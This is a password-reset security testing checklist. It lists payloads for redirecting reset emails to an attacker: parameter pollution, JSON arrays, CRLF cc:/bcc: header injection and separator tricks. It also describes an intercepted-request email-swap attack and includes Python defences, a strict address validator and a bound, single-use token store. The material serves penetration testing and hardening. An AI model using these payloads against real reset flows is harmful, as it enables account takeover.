Reset Password
Password Reset Security Testing Checklist
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
# no domain
email=victim
# no TLD (top-level domain)
email=victim@xyz
# change parameter case
email=victim@mail.com&Email=attacker@mail.com
email@email.com**,**victim@hack.secry
email@email**","**victim@hack.secry
email@email.com**:**victim@hack.secry
email@email.com**%0d%0a**victim@hack.secry
**%0d%0a**victim@hack.secry
**%0a**victim@hack.secry
victim@hack.secry**%0d%0a**
victim@hack.secry**%0a**
victim@hack.secry**%0d**
victim@hack.secry**%00**
victim@hack.secry**{{}}**
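Every payload above probes the same server-side weakness: the reset handler accepting more than one recipient, or a recipient it never stored. The following is an added example (not code from the original checklist) of how a handler can reject each class at once: it requires exactly one `email` parameter after case-folding the key, refuses arrays, CR/LF/NUL, spaces and list separators, requires a domain with a TLD, and then sends only to the address held on file for the matching account. The `ACCOUNTS` table and the `ResetRequestError` class are constructed for the example.

```python
import re
from urllib.parse import parse_qsl

# Constructed account store: the only addresses reset mail may ever be sent to.
ACCOUNTS = {"victim@mail.com": {"id": 1, "email": "victim@mail.com"}}

# Conservative address shape: one local part, one '@', a dotted domain ending in an
# alphabetic TLD of at least two characters. Whitespace, control characters and
# list separators cannot match at all.
EMAIL_RE = re.compile(
    r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}"
)

# Checked separately from the regex so a rejection can be logged with a specific
# reason (header injection vs. malformed address), which helps detection.
FORBIDDEN = set(",;|:\r\n\t\x00 \"'<>{}")


class ResetRequestError(ValueError):
    """Raised when a reset request does not carry exactly one clean address."""


def extract_single_email(params):
    """params is either a list of (name, value) pairs from a form body / query
    string or a dict decoded from JSON. Returns one normalised address or raises."""
    pairs = list(params.items()) if isinstance(params, dict) else list(params)

    # Parameter pollution and key-case variants (email / Email / EMAIL): every key
    # that case-folds to "email" counts, and there must be exactly one.
    matches = [v for k, v in pairs if k.casefold() == "email"]
    if len(matches) != 1:
        raise ResetRequestError("expected exactly one email parameter")

    value = matches[0]
    # JSON arrays such as {"email": [...]} are rejected outright.
    if not isinstance(value, str):
        raise ResetRequestError("email must be a string")
    # CR/LF (cc:/bcc: injection), NUL, spaces, and ,;|: separators.
    if any(c in FORBIDDEN for c in value) or not value.isprintable():
        raise ResetRequestError("email contains forbidden characters")
    # Missing domain or TLD, or anything else that is not a single address.
    if not EMAIL_RE.fullmatch(value):
        raise ResetRequestError("email is not a single well-formed address")
    return value.lower()


def resolve_recipient(params):
    """Return the address the reset mail should go to, or None when the request is
    rejected or no account matches. The recipient always comes from the stored
    account record, never from the submitted value."""
    try:
        submitted = extract_single_email(params)
    except ResetRequestError:
        return None  # a real handler would log the reason here
    account = ACCOUNTS.get(submitted)
    return account["email"] if account else None


def resolve_from_query(query_string):
    """Convenience wrapper for URL-encoded bodies; parse_qsl percent-decodes values,
    so %0A%0D and %20 arrive as real control characters and are rejected."""
    return resolve_recipient(parse_qsl(query_string, keep_blank_values=True))


if __name__ == "__main__":
    for body in ("email=victim@mail.com",
                 "email=victim@mail.com&email=hacker@mail.com",
                 "email=victim@mail.com%0A%0Dcc:hacker@mail.com",
                 "email=victim@xyz"):
        print(f"{body!r:55} -> {resolve_from_query(body)}")
```

Because the handler never echoes the submitted string into the outgoing mail, even an address that slipped past validation could only reach whatever the account record already holds; the validation exists to keep the account lookup itself unambiguous.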
Step 1: The attacker enters the victim's email address or mobile number into the forgot-password field.
Step 2: The attacker intercepts the request and sees JSON data like this:
{"email":"victim@gmail.com","token":"1234"}
Step 3: The attacker changes the victim's email to their own address
{"email":"attacker@gmail.com","token":"1234"}
and forwards the request.
* Also check whether the old token is deactivated or not once a new one is requested.
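The scenario above succeeds only if the server trusts the `email` field in the reset request instead of the account the token was issued for, or keeps old tokens alive. As an added example, not part of the original checklist, here is a Python token store that binds each token to one account, accepts it once, expires it, and invalidates any earlier token when a new one is issued. The `ResetTokenStore` class, the `TOKEN_TTL` value and the injectable clock are assumptions made for the example.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL = 15 * 60  # seconds a reset token stays valid (constructed value)


class ResetTokenStore:
    """In-memory store of password-reset tokens keyed by their SHA-256 hash, so a
    database dump does not expose usable tokens. `now` is injectable for testing."""

    def __init__(self, now=time.time):
        self._now = now
        self._records = {}  # token hash -> {"account": str, "expires": float, "used": bool}

    @staticmethod
    def _hash(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, account):
        """Create a fresh token for `account` (a string identifier such as the
        account's email). Any earlier live token for the same account is retired,
        so only the most recently issued token can ever be redeemed."""
        for rec in self._records.values():
            if rec["account"] == account:
                rec["used"] = True
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._records[self._hash(token)] = {
            "account": account,
            "expires": self._now() + TOKEN_TTL,
            "used": False,
        }
        return token

    def redeem(self, token, submitted_account):
        """Consume `token` and return the account whose password may now change,
        or None. The account comes from the stored record; the value the client
        submitted alongside the token must match it, and a mismatch is a failure
        rather than a reason to switch accounts."""
        rec = self._records.get(self._hash(token))
        if rec is None:
            return None
        if rec["used"] or rec["expires"] < self._now():
            return None
        # Constant-time comparison so the check does not leak how many leading
        # characters of the bound account matched.
        if not hmac.compare_digest(rec["account"].encode(), str(submitted_account).encode()):
            return None
        rec["used"] = True  # single use: the same token is never accepted twice
        return rec["account"]


if __name__ == "__main__":
    store = ResetTokenStore()
    t = store.issue("victim@gmail.com")
    print("attacker email + victim token ->", store.redeem(t, "attacker@gmail.com"))
    print("victim email + victim token   ->", store.redeem(t, "victim@gmail.com"))
    print("replayed token                ->", store.redeem(t, "victim@gmail.com"))
```

When testing an application against the three steps above, the observable signs of this design are: the forwarded request with the swapped email fails, the original token stops working after one successful use, and requesting a second reset makes the first link dead.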